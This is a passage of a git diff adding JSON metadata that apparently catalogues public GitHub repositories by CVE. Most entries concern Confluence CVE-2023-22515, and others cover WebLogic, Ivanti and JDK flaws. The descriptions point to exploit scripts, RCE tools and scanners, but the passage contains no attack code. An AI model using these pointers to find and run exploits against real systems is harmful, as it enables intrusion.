+ "html_url": "https:\/\/github.com\/MMarch7\/weblogic_CVE-2023-21839_POC-EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-23T11:36:29Z",
+ "updated_at": "2023-10-23T11:36:29Z",
+ "pushed_at": "2023-10-23T13:44:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 726816567,
+ "name": "Gui-poc-test",
+ "full_name": "Romanc9\/Gui-poc-test",
+ "owner": {
+ "login": "Romanc9",
+ "id": 55196564,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55196564?v=4",
+ "html_url": "https:\/\/github.com\/Romanc9"
+ },
+ "html_url": "https:\/\/github.com\/Romanc9\/Gui-poc-test",
+ "description": "A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432",
+ "fork": false,
+ "created_at": "2023-12-03T13:45:34Z",
+ "updated_at": "2024-03-31T13:58:48Z",
+ "pushed_at": "2023-12-05T17:58:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2022-39197",
+ "cve-2023-21839",
+ "cve-2023-28432"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 753664721,
+ "name": "CVE-2024-20931",
+ "full_name": "dinosn\/CVE-2024-20931",
+ "owner": {
+ "login": "dinosn",
+ "id": 3851678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4",
+ "html_url": "https:\/\/github.com\/dinosn"
+ },
+ "html_url": "https:\/\/github.com\/dinosn\/CVE-2024-20931",
+ "description": "CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839",
+ "fork": false,
+ "created_at": "2024-02-06T15:09:33Z",
+ "updated_at": "2024-06-24T06:40:58Z",
+ "pushed_at": "2024-02-06T15:56:12Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21887.json b/2023/CVE-2023-21887.json
new file mode 100644
index 0000000000..99b716b730
--- /dev/null
+++ b/2023/CVE-2023-21887.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 745522429,
+ "name": "CVE-2023-21887",
+ "full_name": "zwxxb\/CVE-2023-21887",
+ "owner": {
+ "login": "zwxxb",
+ "id": 68430832,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430832?v=4",
+ "html_url": "https:\/\/github.com\/zwxxb"
+ },
+ "html_url": "https:\/\/github.com\/zwxxb\/CVE-2023-21887",
+ "description": "Remote Code Execution : Ivanti ",
+ "fork": false,
+ "created_at": "2024-01-19T14:17:49Z",
+ "updated_at": "2024-03-08T15:05:53Z",
+ "pushed_at": "2024-01-19T15:30:18Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21931.json b/2023/CVE-2023-21931.json
new file mode 100644
index 0000000000..20eb65785d
--- /dev/null
+++ b/2023/CVE-2023-21931.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 707992611,
+ "name": "weblogic_CVE-2023-21931_POC-EXP",
+ "full_name": "MMarch7\/weblogic_CVE-2023-21931_POC-EXP",
+ "owner": {
+ "login": "MMarch7",
+ "id": 148614285,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148614285?v=4",
+ "html_url": "https:\/\/github.com\/MMarch7"
+ },
+ "html_url": "https:\/\/github.com\/MMarch7\/weblogic_CVE-2023-21931_POC-EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-21T07:30:24Z",
+ "updated_at": "2023-10-25T03:20:15Z",
+ "pushed_at": "2023-10-21T14:14:41Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-21939.json b/2023/CVE-2023-21939.json
new file mode 100644
index 0000000000..88ad23e085
--- /dev/null
+++ b/2023/CVE-2023-21939.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 683311147,
+ "name": "CVE-2023-21939",
+ "full_name": "Y4Sec-Team\/CVE-2023-21939",
+ "owner": {
+ "login": "Y4Sec-Team",
+ "id": 141109859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141109859?v=4",
+ "html_url": "https:\/\/github.com\/Y4Sec-Team"
+ },
+ "html_url": "https:\/\/github.com\/Y4Sec-Team\/CVE-2023-21939",
+ "description": "JDK CVE-2023-21939",
+ "fork": false,
+ "created_at": "2023-08-26T06:45:26Z",
+ "updated_at": "2024-03-31T14:26:53Z",
+ "pushed_at": "2023-08-26T06:57:55Z",
+ "stargazers_count": 97,
+ "watchers_count": 97,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 97,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-22074.json b/2023/CVE-2023-22074.json
new file mode 100644
index 0000000000..632a7926a9
--- /dev/null
+++ b/2023/CVE-2023-22074.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 709883034,
+ "name": "CVE-2023-22074",
+ "full_name": "emad-almousa\/CVE-2023-22074",
+ "owner": {
+ "login": "emad-almousa",
+ "id": 48997609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4",
+ "html_url": "https:\/\/github.com\/emad-almousa"
+ },
+ "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2023-22074",
+ "description": "CVE-2023-22074",
+ "fork": false,
+ "created_at": "2023-10-25T15:26:17Z",
+ "updated_at": "2023-10-25T15:26:17Z",
+ "pushed_at": "2023-10-25T15:27:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2215.json b/2023/CVE-2023-2215.json
new file mode 100644
index 0000000000..f349adf7e4
--- /dev/null
+++ b/2023/CVE-2023-2215.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 703479135,
+ "name": "CVE-2023-2215",
+ "full_name": "zwxxb\/CVE-2023-2215",
+ "owner": {
+ "login": "zwxxb",
+ "id": 68430832,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430832?v=4",
+ "html_url": "https:\/\/github.com\/zwxxb"
+ },
+ "html_url": "https:\/\/github.com\/zwxxb\/CVE-2023-2215",
+ "description": "PoC For CVE-2023-2215 - Auth bypass ",
+ "fork": false,
+ "created_at": "2023-10-11T10:16:39Z",
+ "updated_at": "2023-10-12T11:03:42Z",
+ "pushed_at": "2023-10-12T14:08:03Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-22515.json b/2023/CVE-2023-22515.json
new file mode 100644
index 0000000000..cc5877b752
--- /dev/null
+++ b/2023/CVE-2023-22515.json
@@ -0,0 +1,733 @@
+[
+ {
+ "id": 701522727,
+ "name": "CVE-2023-22515-Scan",
+ "full_name": "ErikWynter\/CVE-2023-22515-Scan",
+ "owner": {
+ "login": "ErikWynter",
+ "id": 55885619,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55885619?v=4",
+ "html_url": "https:\/\/github.com\/ErikWynter"
+ },
+ "html_url": "https:\/\/github.com\/ErikWynter\/CVE-2023-22515-Scan",
+ "description": "Scanner for CVE-2023-22515 - Broken Access Control Vulnerability in Atlassian Confluence",
+ "fork": false,
+ "created_at": "2023-10-06T20:29:44Z",
+ "updated_at": "2024-06-25T09:14:25Z",
+ "pushed_at": "2023-10-06T21:59:30Z",
+ "stargazers_count": 72,
+ "watchers_count": 72,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 72,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 703182036,
+ "name": "CVE-2023-22515-POC",
+ "full_name": "j3seer\/CVE-2023-22515-POC",
+ "owner": {
+ "login": "j3seer",
+ "id": 58823465,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58823465?v=4",
+ "html_url": "https:\/\/github.com\/j3seer"
+ },
+ "html_url": "https:\/\/github.com\/j3seer\/CVE-2023-22515-POC",
+ "description": "Poc for CVE-2023-22515",
+ "fork": false,
+ "created_at": "2023-10-10T18:45:10Z",
+ "updated_at": "2023-11-18T17:19:24Z",
+ "pushed_at": "2023-10-10T19:59:25Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 703240587,
+ "name": "CVE-2023-22515",
+ "full_name": "Chocapikk\/CVE-2023-22515",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-22515",
+ "description": "CVE-2023-22515: Confluence Broken Access Control Exploit",
+ "fork": false,
+ "created_at": "2023-10-10T21:40:09Z",
+ "updated_at": "2024-06-21T00:11:36Z",
+ "pushed_at": "2023-10-17T22:04:13Z",
+ "stargazers_count": 125,
+ "watchers_count": 125,
+ "has_discussions": false,
+ "forks_count": 29,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "broken-access-control",
+ "confluence",
+ "cve-2023-22515",
+ "exploit",
+ "infosec",
+ "privilege-escalation",
+ "security",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 29,
+ "watchers": 125,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 703437161,
+ "name": "CVE-2023-22515",
+ "full_name": "ad-calcium\/CVE-2023-22515",
+ "owner": {
+ "login": "ad-calcium",
+ "id": 33044636,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33044636?v=4",
+ "html_url": "https:\/\/github.com\/ad-calcium"
+ },
+ "html_url": "https:\/\/github.com\/ad-calcium\/CVE-2023-22515",
+ "description": "Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具",
+ "fork": false,
+ "created_at": "2023-10-11T08:42:17Z",
+ "updated_at": "2024-06-21T00:11:36Z",
+ "pushed_at": "2023-10-16T02:24:02Z",
+ "stargazers_count": 106,
+ "watchers_count": 106,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 106,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 703506378,
+ "name": "CVE-2023-22515",
+ "full_name": "kh4sh3i\/CVE-2023-22515",
+ "owner": {
+ "login": "kh4sh3i",
+ "id": 64693844,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4",
+ "html_url": "https:\/\/github.com\/kh4sh3i"
+ },
+ "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2023-22515",
+ "description": "CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server",
+ "fork": false,
+ "created_at": "2023-10-11T11:21:47Z",
+ "updated_at": "2024-05-26T08:27:32Z",
+ "pushed_at": "2024-05-26T08:27:35Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "atlassian",
+ "confluence",
+ "confluent-platform",
+ "cve",
+ "exploit",
+ "exploitation",
+ "jira",
+ "rce",
+ "scanner",
+ "vulnerability",
+ "vulnerability-scanners"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 703835604,
+ "name": "CVE-2023-22515",
+ "full_name": "sincere9\/CVE-2023-22515",
+ "owner": {
+ "login": "sincere9",
+ "id": 128219249,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128219249?v=4",
+ "html_url": "https:\/\/github.com\/sincere9"
+ },
+ "html_url": "https:\/\/github.com\/sincere9\/CVE-2023-22515",
+ "description": "Confluence未授权添加管理员用户漏洞利用脚本",
+ "fork": false,
+ "created_at": "2023-10-12T02:41:23Z",
+ "updated_at": "2023-12-28T06:39:21Z",
+ "pushed_at": "2023-10-26T07:39:57Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 704360942,
+ "name": "CVE-2023-22515",
+ "full_name": "Le1a\/CVE-2023-22515",
+ "owner": {
+ "login": "Le1a",
+ "id": 97610822,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4",
+ "html_url": "https:\/\/github.com\/Le1a"
+ },
+ "html_url": "https:\/\/github.com\/Le1a\/CVE-2023-22515",
+ "description": "Confluence Data Center & Server 权限提升漏洞 Exploit",
+ "fork": false,
+ "created_at": "2023-10-13T05:18:54Z",
+ "updated_at": "2023-10-16T05:58:42Z",
+ "pushed_at": "2023-10-13T05:21:37Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 704422927,
+ "name": "confluence-cve-2023-22515",
+ "full_name": "Vulnmachines\/confluence-cve-2023-22515",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/confluence-cve-2023-22515",
+ "description": "Confluence Broken Access Control",
+ "fork": false,
+ "created_at": "2023-10-13T08:19:07Z",
+ "updated_at": "2023-10-14T09:17:41Z",
+ "pushed_at": "2023-10-13T08:23:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 704429158,
+ "name": "CVE-2023-22515",
+ "full_name": "iveresk\/CVE-2023-22515",
+ "owner": {
+ "login": "iveresk",
+ "id": 28754633,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4",
+ "html_url": "https:\/\/github.com\/iveresk"
+ },
+ "html_url": "https:\/\/github.com\/iveresk\/CVE-2023-22515",
+ "description": "iveresk-CVE-2023-22515",
+ "fork": false,
+ "created_at": "2023-10-13T08:36:21Z",
+ "updated_at": "2023-10-17T06:31:16Z",
+ "pushed_at": "2023-10-13T15:43:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 707587880,
+ "name": "CVE-2023-22515_RCE",
+ "full_name": "youcannotseemeagain\/CVE-2023-22515_RCE",
+ "owner": {
+ "login": "youcannotseemeagain",
+ "id": 48853857,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48853857?v=4",
+ "html_url": "https:\/\/github.com\/youcannotseemeagain"
+ },
+ "html_url": "https:\/\/github.com\/youcannotseemeagain\/CVE-2023-22515_RCE",
+ "description": "Confluence后台rce",
+ "fork": false,
+ "created_at": "2023-10-20T08:23:47Z",
+ "updated_at": "2024-06-21T00:11:38Z",
+ "pushed_at": "2023-10-20T08:25:02Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 708092317,
+ "name": "cve-2023-22515-exp",
+ "full_name": "DsaHen\/cve-2023-22515-exp",
+ "owner": {
+ "login": "DsaHen",
+ "id": 83688624,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83688624?v=4",
+ "html_url": "https:\/\/github.com\/DsaHen"
+ },
+ "html_url": "https:\/\/github.com\/DsaHen\/cve-2023-22515-exp",
+ "description": "cve-2023-22515的python利用脚本",
+ "fork": false,
+ "created_at": "2023-10-21T13:59:16Z",
+ "updated_at": "2023-10-21T15:54:08Z",
+ "pushed_at": "2023-10-21T14:07:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 708570186,
+ "name": "CVE-2023-22515",
+ "full_name": "joaoviictorti\/CVE-2023-22515",
+ "owner": {
+ "login": "joaoviictorti",
+ "id": 85838827,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85838827?v=4",
+ "html_url": "https:\/\/github.com\/joaoviictorti"
+ },
+ "html_url": "https:\/\/github.com\/joaoviictorti\/CVE-2023-22515",
+ "description": "CVE-2023-22515 (Confluence Broken Access Control Exploit)",
+ "fork": false,
+ "created_at": "2023-10-22T23:37:56Z",
+ "updated_at": "2023-12-07T18:07:29Z",
+ "pushed_at": "2023-11-22T21:44:15Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 710666806,
+ "name": "CVE-2023-22515",
+ "full_name": "C1ph3rX13\/CVE-2023-22515",
+ "owner": {
+ "login": "C1ph3rX13",
+ "id": 80873500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4",
+ "html_url": "https:\/\/github.com\/C1ph3rX13"
+ },
+ "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-22515",
+ "description": "CVE-2023-22515",
+ "fork": false,
+ "created_at": "2023-10-27T07:20:35Z",
+ "updated_at": "2024-01-14T12:52:24Z",
+ "pushed_at": "2023-12-12T03:02:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 711670398,
+ "name": "confluence-hack",
+ "full_name": "AIex-3\/confluence-hack",
+ "owner": {
+ "login": "AIex-3",
+ "id": 76010792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76010792?v=4",
+ "html_url": "https:\/\/github.com\/AIex-3"
+ },
+ "html_url": "https:\/\/github.com\/AIex-3\/confluence-hack",
+ "description": "CVE-2023-22515",
+ "fork": false,
+ "created_at": "2023-10-30T00:17:45Z",
+ "updated_at": "2024-06-25T05:25:20Z",
+ "pushed_at": "2023-11-10T17:43:40Z",
+ "stargazers_count": 46,
+ "watchers_count": 46,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "broken-access-control",
+ "confluence",
+ "cve-2023-22515",
+ "cybersecurity",
+ "exploit",
+ "privilege-escalation",
+ "remote-code-execution",
+ "security",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 46,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 715922032,
+ "name": "CVE-2023-22515",
+ "full_name": "LucasPDiniz\/CVE-2023-22515",
+ "owner": {
+ "login": "LucasPDiniz",
+ "id": 57265360,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4",
+ "html_url": "https:\/\/github.com\/LucasPDiniz"
+ },
+ "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2023-22515",
+ "description": "Server Broken Access Control in Confluence - CVE-2023-22515",
+ "fork": false,
+ "created_at": "2023-11-08T05:18:30Z",
+ "updated_at": "2023-11-09T02:18:00Z",
+ "pushed_at": "2023-11-08T05:19:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "confluence",
+ "cve",
+ "cve-2023-22515",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 716585912,
+ "name": "Confluence-EvilJar",
+ "full_name": "aaaademo\/Confluence-EvilJar",
+ "owner": {
+ "login": "aaaademo",
+ "id": 147170429,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147170429?v=4",
+ "html_url": "https:\/\/github.com\/aaaademo"
+ },
+ "html_url": "https:\/\/github.com\/aaaademo\/Confluence-EvilJar",
+ "description": "配合 CVE-2023-22515 后台上传jar包实现RCE",
+ "fork": false,
+ "created_at": "2023-11-09T12:55:25Z",
+ "updated_at": "2024-03-15T16:30:11Z",
+ "pushed_at": "2023-11-09T14:21:58Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 723825331,
+ "name": "CVE-2023-22515-Scan.",
+ "full_name": "edsonjt81\/CVE-2023-22515-Scan.",
+ "owner": {
+ "login": "edsonjt81",
+ "id": 27496739,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4",
+ "html_url": "https:\/\/github.com\/edsonjt81"
+ },
+ "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2023-22515-Scan.",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-26T21:24:55Z",
+ "updated_at": "2023-11-26T21:25:08Z",
+ "pushed_at": "2024-05-21T04:09:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 724883216,
+ "name": "cve-2023-22515",
+ "full_name": "INTfinityConsulting\/cve-2023-22515",
+ "owner": {
+ "login": "INTfinityConsulting",
+ "id": 104363833,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104363833?v=4",
+ "html_url": "https:\/\/github.com\/INTfinityConsulting"
+ },
+ "html_url": "https:\/\/github.com\/INTfinityConsulting\/cve-2023-22515",
+ "description": "Confluence broken access control to code execution",
+ "fork": false,
+ "created_at": "2023-11-29T01:34:35Z",
+ "updated_at": "2023-11-29T01:37:35Z",
+ "pushed_at": "2023-11-30T00:02:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 738213429,
+ "name": "Exploit-CVE-2023-22515",
+ "full_name": "CalegariMindSec\/Exploit-CVE-2023-22515",
+ "owner": {
+ "login": "CalegariMindSec",
+ "id": 68512056,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68512056?v=4",
+ "html_url": "https:\/\/github.com\/CalegariMindSec"
+ },
+ "html_url": "https:\/\/github.com\/CalegariMindSec\/Exploit-CVE-2023-22515",
+ "description": "A simple exploit for CVE-2023-22515",
+ "fork": false,
+ "created_at": "2024-01-02T17:40:24Z",
+ "updated_at": "2024-01-02T23:11:04Z",
+ "pushed_at": "2024-01-02T23:15:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 762759550,
+ "name": "CVE-2023-22515",
+ "full_name": "rxerium\/CVE-2023-22515",
+ "owner": {
+ "login": "rxerium",
+ "id": 59293085,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59293085?v=4",
+ "html_url": "https:\/\/github.com\/rxerium"
+ },
+ "html_url": "https:\/\/github.com\/rxerium\/CVE-2023-22515",
+ "description": "Atlassian Confluence Data Center and Server Broken Access Control Vulnerability",
+ "fork": false,
+ "created_at": "2024-02-24T16:04:35Z",
+ "updated_at": "2024-03-02T15:48:20Z",
+ "pushed_at": "2024-02-24T16:12:56Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "atlassian",
+ "atlassian-confluence",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 792458695,
+ "name": "NSE--CVE-2023-22515",
+ "full_name": "fyx1t\/NSE--CVE-2023-22515",
+ "owner": {
+ "login": "fyx1t",
+ "id": 57405939,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57405939?v=4",
+ "html_url": "https:\/\/github.com\/fyx1t"
+ },
+ "html_url": "https:\/\/github.com\/fyx1t\/NSE--CVE-2023-22515",
+ "description": "NSE script for checking the presence of CVE-2023-22515",
+ "fork": false,
+ "created_at": "2024-04-26T17:57:33Z",
+ "updated_at": "2024-04-26T17:58:13Z",
+ "pushed_at": "2024-04-26T17:58:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811026888,
+ "name": "CVE-2023-22515-check",
+ "full_name": "s1d6point7bugcrowd\/CVE-2023-22515-check",
+ "owner": {
+ "login": "s1d6point7bugcrowd",
+ "id": 163605035,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163605035?v=4",
+ "html_url": "https:\/\/github.com\/s1d6point7bugcrowd"
+ },
+ "html_url": "https:\/\/github.com\/s1d6point7bugcrowd\/CVE-2023-22515-check",
